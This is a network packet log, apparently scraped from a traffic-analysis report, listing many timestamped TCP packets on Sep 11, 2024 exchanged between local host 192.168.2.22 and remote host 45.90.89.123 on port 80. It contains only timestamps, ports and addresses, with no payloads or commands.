                                                Sep 11, 2024 20:22:25.142453909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142462969 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142473936 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142491102 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142519951 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142610073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142620087 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142628908 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142638922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142649889 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142657042 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142672062 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142699957 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142709970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142719030 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142730951 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142740965 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142745018 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142759085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142767906 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142803907 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264727116 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264847994 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264858961 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264868975 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264878988 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264892101 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264902115 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264910936 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264921904 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264930964 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264941931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264969110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264980078 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264985085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.264980078 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.264996052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265007019 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265017033 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265017986 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265017033 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265029907 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265031099 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265041113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265053034 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265053988 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265063047 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265073061 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265074968 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265084982 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265099049 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265100002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265117884 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265120983 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265127897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265137911 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265146017 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265147924 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265160084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265171051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265172958 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265182018 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265192032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265203953 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265204906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265216112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265225887 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265232086 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265239000 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265252113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265259981 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265269995 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265283108 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265286922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265295982 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265305996 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265312910 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265317917 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265327930 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265337944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265343904 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265347958 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265361071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265371084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265376091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265376091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265382051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265392065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265403986 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265408039 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265418053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265429974 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265439987 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265440941 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265453100 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265459061 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265464067 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265475035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265485048 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265486956 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265496016 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.265501022 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265528917 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.265558004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.272047043 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272061110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272072077 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.272106886 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273299932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273312092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273322105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273334026 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273345947 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273439884 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273452997 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273458004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273458004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273487091 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273530006 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273540020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273552895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273576021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273696899 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273715973 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273727894 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273740053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273741961 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273752928 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273763895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273767948 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273777008 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273782015 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273788929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273799896 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273812056 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273817062 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273823977 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273828030 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273834944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273861885 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273873091 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273885012 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273895979 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273907900 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.273916960 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.273920059 CEST804916345.90.89.123192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Sep 11, 2024 20:22:25.273931980 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.273942947 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.273945093 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.273957014 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.273963928 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.273969889 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.273996115 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274056911 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274069071 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274085045 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274101019 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274102926 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274113894 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274122000 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274125099 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274143934 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274151087 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274156094 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274168015 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274179935 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274185896 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274194002 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274204969 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.274208069 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.274236917 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.275105000 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275116920 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275130033 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275141954 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275152922 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.275155067 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275166988 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275178909 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275182009 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.275188923 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275201082 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.275203943 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.275226116 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.278934002 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.278985977 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.279352903 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.279648066 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.279695034 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356614113 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356632948 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356645107 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356657028 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356677055 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356688023 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356700897 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356714010 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356767893 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356774092 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356780052 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356792927 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356806040 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356806040 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356806040 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356839895 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356873035 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356885910 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356904030 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356914997 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356925964 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356928110 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356960058 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.356976032 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.356988907 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.357024908 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.357096910 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.357112885 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.357151031 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.393944025 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.393974066 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394001961 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394015074 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394026041 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394027948 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394046068 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394054890 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394059896 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394071102 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394082069 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394085884 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394093990 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394105911 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394107103 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394119024 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394135952 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394145966 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394176960 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394190073 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394201040 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394228935 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394316912 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394365072 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394392014 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394403934 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394437075 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394515991 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394527912 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394539118 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394562960 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394583941 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394594908 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394608974 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394623041 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394650936 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394675016 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394686937 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394696951 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394722939 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394792080 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394803047 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394814014 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394825935 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.394840956 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.394864082 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395015955 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395028114 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395039082 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395051003 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395061970 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395062923 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395073891 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395092964 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395104885 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395179033 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395190001 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395200968 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395226002 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395266056 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395286083 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395297050 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395308971 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395312071 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395334959 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395426989 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395440102 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395451069 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395464897 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395477057 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395508051 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395556927 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395623922 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395637035 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395668983 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395729065 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395741940 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395751953 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395764112 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395776987 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395804882 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395874023 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395884991 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395898104 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395915985 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395922899 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395929098 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395940065 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395951033 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395962000 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.395963907 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395977020 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.395993948 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.396018028 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.396155119 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.396166086 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.396178961 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.396202087 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399063110 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399075985 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399085999 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399131060 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399691105 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399703026 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399714947 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399781942 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399792910 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399802923 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399816036 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399869919 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399869919 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399869919 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399921894 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399933100 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399943113 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399955034 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399966955 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399972916 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.399977922 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.399990082 CEST  80           49163      45.90.89.123   192.168.2.22
